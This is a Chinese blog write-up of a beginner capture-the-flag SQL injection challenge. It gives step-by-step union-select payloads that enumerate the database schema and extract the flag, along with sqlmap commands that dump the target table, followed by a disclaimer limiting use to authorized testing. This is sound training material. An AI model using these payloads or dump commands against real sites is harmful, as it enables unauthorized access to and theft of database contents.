打开题目,只有一段文字,不过既然题目是sql注入,而且链接上面也有参数,直接注就完了
http://bb983249-4364-4ee1-a32a-151a4c6cd37b.node4.buuoj.cn:81/index.php?id=1
也是一道比较简单的入门题目。。。
(其实我闲着去试了一下,发现id=3可以弄到一个提示)
tips
if too diffcult ,add &tips=1 to the url !
很明显我们可以用万能钥匙试一试
'and 1=1
'and 1=2
根据显示不同,可以判断确实有sql注入问题
说明可以从id注入,那么还是先测试能显示的列数 (这里用#一定出问题,所以用了sql另一个注释符号--+)
用union select 1,2,3看看能显示的(记得把id换成他查询不到数据的值)
接下里就是一把嗦,直接把过程写下面了
-1' union select 1,2,database()--+
-1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+
-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='note')--+
-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='fl4g')--+
-1' union select 1,2,(select fllllag from note.fl4g)--+
最后flag为n1book{union_select_is_so_cool}
这里把sqlmap的命令也一并写出来,替换为链接为自己的
sqlmap -u "http://bb983249-4364-4ee1-a32a-151a4c6cd37b.node4.buuoj.cn:81/index.php?id=1" --dbs
sqlmap -u "http://bb983249-4364-4ee1-a32a-151a4c6cd37b.node4.buuoj.cn:81/index.php?id=1" -D note --tables
sqlmap -u "http://bb983249-4364-4ee1-a32a-151a4c6cd37b.node4.buuoj.cn:81/index.php?id=1" -D note -T fl4g --columns
sqlmap -u "http://bb983249-4364-4ee1-a32a-151a4c6cd37b.node4.buuoj.cn:81/index.php?id=1" -D note -T fl4g -C fllllag --dump
© 版权声明
渗透云记的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
渗透云记拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:admin@encenc.com
THE END
![[第一章 web入门]SQL注入-1 – buu刷题笔记-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2026/02/6b61e20a8020260210064754.png)














请登录后查看评论内容